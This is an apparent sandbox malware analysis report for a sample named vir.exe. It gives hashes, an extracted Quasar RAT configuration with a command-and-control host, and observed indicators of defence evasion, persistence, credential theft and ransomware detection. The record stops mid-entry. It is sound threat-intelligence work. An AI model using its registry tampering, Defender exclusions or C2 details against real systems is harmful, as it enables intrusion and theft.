Resubmissions
26-12-2024 15:01
241226-sec6vayjgx 1027-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 1015-08-2024 22:57
240815-2w8thszepa 10Analysis
-
max time kernel
413s -
max time network
419s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 23:15
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
vir.exe
Resource
win10v2004-20240802-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral2/files/0x000700000002343d-230.dat family_umbral behavioral2/files/0x0007000000023564-3723.dat family_umbral behavioral2/memory/6104-3736-0x0000023ABBBD0000-0x0000023ABBC10000-memory.dmp family_umbral -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
-
MassLogger Main payload 2 IoCs
resource yara_rule behavioral2/memory/4412-4640-0x0000000000400000-0x0000000000541000-memory.dmp family_masslogger behavioral2/memory/4412-4637-0x0000000000A30000-0x0000000000ACA000-memory.dmp family_masslogger -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" goqabvnnwp.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" goqabvnnwp.exe -
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023439-226.dat family_quasar behavioral2/memory/6332-3482-0x0000000000910000-0x0000000000C34000-memory.dmp family_quasar -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" goqabvnnwp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\the.exe = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" goqabvnnwp.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 78 6712 mshta.exe 122 5884 rundll32.exe 179 5884 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3316 powershell.exe 768 powershell.exe 6008 powershell.exe 6444 powershell.exe 5236 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" goqabvnnwp.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Manipulates Digital Signatures 1 TTPs 1 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\449AECBA24486E3AA849913E496584EB9098B605\Blob = 0f0000000100000014000000321cf76ac2ad8635d5429513e8021a1c2c7322430200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000620039003000630061003000370037002d0034003200330032002d0034003000390034002d0039006500350039002d0032006200300030006300650039003600610037003100300000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000449aecba24486e3aa849913e496584eb9098b605200000000100000000030000308202fc308201e4a00302010202101b9aa22e1c872e82437b8c1aa8f62dfd300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831353233313731355a180f32313234303732323233313731355a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100ac8286f18aa88af154503402136e34970092edc48862ac647a1db9b2d0b69ab401510bb76c1ec159bd5f2021c73fce8f5e6d47a3f2fd89781191cf6cb8fc7c92ad120755ba3318ded01bcbf5d08ec3b74c59d72786f6cd2bea3b2f4513e4d3351b8c2ac66fbf1897782299b20a9e646e0b923babb3983e80ffc38d93ed6e2c22cff8e255029cb903bfa47f9b5eb9705480cae3ee5d26e08417c299753cb2ed6eefdcb1c3e2bf50f126f67011cf255e315468e0c69414fe7db062212e3f71fceabf8cdbc3ebd6e9172b73f98b0feaacc3bbc8e9184f4aec8492df9f956447f8ef850dc5a6f4be515b0913ca3d384776bd33e13b3ed0d54af401dd1d9f7054be090203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404453455958554f440030090603551d1304023000300d06092a864886f70d010105050003820101001b64038d57543de988b1dfa6144237b19b0115198f0d18a6580e8d8561574e8143c92c88ff18e9bcc9c20b24c429872662ebf643bc8fcfb2a5d88f0f8635065aca41c712efa35f7bedb3235176e92c8c4142f5aad4bab187f01e2ce1ecccb2f3b6a56a6b99787f81b7eaee8ffeda72672e9d2f2d416b4f9d611b8b79a0168871883b4bf8e15990c559deef672686c9be7ac3f447bd6a1f4bd4be9c29a70ae37f08e40b6e403418b9e0369bad27dfcd45a37856642d171afddff9df7029868f66ba5102ca7f1738bb9267509844721b7191531947c2b1c88d9fb0b6b9b6fb6180964987d7372adac00eb3253ad620875984783f60616a4d055ff58ce4dd59f96b powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 6828 netsh.exe -
Possible privilege escalation attempt 5 IoCs
pid Process 1388 takeown.exe 2932 icacls.exe 1860 takeown.exe 6252 icacls.exe 6560 icacls.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/3376-248-0x0000000005FB0000-0x0000000006500000-memory.dmp net_reactor behavioral2/memory/3376-249-0x0000000005A50000-0x0000000005F9E000-memory.dmp net_reactor behavioral2/memory/3376-255-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-250-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-262-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-276-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-266-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-269-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-264-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-260-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-257-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-253-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-251-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-286-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-280-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-274-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-272-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-270-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-290-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-284-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-282-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-296-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-294-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-310-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-314-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-312-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-308-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-306-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-304-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-302-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-300-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-292-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-288-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-298-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor behavioral2/memory/3376-278-0x0000000005A50000-0x0000000005F99000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 22 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation sjhkhda.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation jaffa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation vir.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation SolaraBootstraper.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation selfaware.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation selfaware.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation Romilyaa.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs notepad.exe -
Executes dropped EXE 50 IoCs
pid Process 2620 ProgressBarSplash.exe 3376 Rover.exe 2784 Google.exe 6392 regmess.exe 6460 1.exe 6568 3.exe 6864 WinaeroTweaker-1.40.0.0-setup.exe 6936 WinaeroTweaker-1.40.0.0-setup.tmp 6332 scary.exe 6280 the.exe 1388 wimloader.dll 6508 Romilyaa.exe 6344 Romilyaa.exe 6632 Romilyaa.exe 4188 Romilyaa.exe 6564 ac3.exe 4428 Romilyaa.exe 4932 freebobux.exe 6336 SolaraBootstraper.exe 5524 wim.dll 2424 SolaraBootstrapper.exe 6104 Umbral.exe 6904 !FIXInj.exe 3808 Romilyaa.exe 4888 Romilyaa.exe 6772 Romilyaa.exe 3528 Romilyaa.exe 5132 Romilyaa.exe 6740 f3cb220f1aaa32ca310586e5f62dcab1.exe 2480 Romilyaa.exe 2040 Romilyaa.exe 5424 Romilyaa.exe 4084 jaffa.exe 2220 jkka.exe 6468 selfaware.exe 1364 sjhkhda.exe 1684 selfaware.exe 4412 sjhkhda.exe 5672 sjhkhda.exe 5216 goqabvnnwp.exe 5352 jzhwakyvvosbjmz.exe 924 xwsrwnbm.exe 1304 hmhxytmhryech.exe 3892 xwsrwnbm.exe 5100 selfaware.exe 3388 selfaware.exe 6888 build3.exe 1112 build3.exe 1792 mstsca.exe 2128 mstsca.exe -
Loads dropped DLL 4 IoCs
pid Process 6460 1.exe 6460 1.exe 6460 1.exe 6936 WinaeroTweaker-1.40.0.0-setup.tmp -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 1388 takeown.exe 2932 icacls.exe 1860 takeown.exe 6252 icacls.exe 6560 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000700000002342a-210.dat upx behavioral2/memory/6568-3407-0x0000000000C30000-0x0000000002257000-memory.dmp upx behavioral2/memory/6568-3461-0x0000000000C30000-0x0000000002257000-memory.dmp upx behavioral2/memory/4932-3692-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral2/memory/4932-3788-0x0000000000400000-0x000000000083E000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" goqabvnnwp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" goqabvnnwp.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook sjhkhda.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\yzcjluli = "goqabvnnwp.exe" jzhwakyvvosbjmz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ikiwqzdu = "jzhwakyvvosbjmz.exe" jzhwakyvvosbjmz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "hmhxytmhryech.exe" jzhwakyvvosbjmz.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a3a657da-b710-41f3-baf4-9fe218840fd0\\selfaware.exe\" --AutoStart" selfaware.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\s: xwsrwnbm.exe File opened (read-only) \??\y: xwsrwnbm.exe File opened (read-only) \??\a: goqabvnnwp.exe File opened (read-only) \??\p: goqabvnnwp.exe File opened (read-only) \??\w: goqabvnnwp.exe File opened (read-only) \??\j: xwsrwnbm.exe File opened (read-only) \??\j: goqabvnnwp.exe File opened (read-only) \??\r: goqabvnnwp.exe File opened (read-only) \??\t: goqabvnnwp.exe File opened (read-only) \??\h: xwsrwnbm.exe File opened (read-only) \??\z: xwsrwnbm.exe File opened (read-only) \??\j: xwsrwnbm.exe File opened (read-only) \??\v: xwsrwnbm.exe File opened (read-only) \??\m: goqabvnnwp.exe File opened (read-only) \??\o: goqabvnnwp.exe File opened (read-only) \??\e: xwsrwnbm.exe File opened (read-only) \??\g: goqabvnnwp.exe File opened (read-only) \??\l: xwsrwnbm.exe File opened (read-only) \??\e: xwsrwnbm.exe File opened (read-only) \??\g: xwsrwnbm.exe File opened (read-only) \??\h: xwsrwnbm.exe File opened (read-only) \??\w: xwsrwnbm.exe File opened (read-only) \??\y: goqabvnnwp.exe File opened (read-only) \??\z: xwsrwnbm.exe File opened (read-only) \??\h: goqabvnnwp.exe File opened (read-only) \??\x: goqabvnnwp.exe File opened (read-only) \??\q: xwsrwnbm.exe File opened (read-only) \??\y: xwsrwnbm.exe File opened (read-only) \??\m: xwsrwnbm.exe File opened (read-only) \??\u: xwsrwnbm.exe File opened (read-only) \??\x: xwsrwnbm.exe File opened (read-only) \??\b: xwsrwnbm.exe File opened (read-only) \??\n: xwsrwnbm.exe File opened (read-only) \??\q: goqabvnnwp.exe File opened (read-only) \??\m: xwsrwnbm.exe File opened (read-only) \??\r: xwsrwnbm.exe File opened (read-only) \??\t: xwsrwnbm.exe File opened (read-only) \??\v: xwsrwnbm.exe File opened (read-only) \??\i: xwsrwnbm.exe File opened (read-only) \??\b: goqabvnnwp.exe File opened 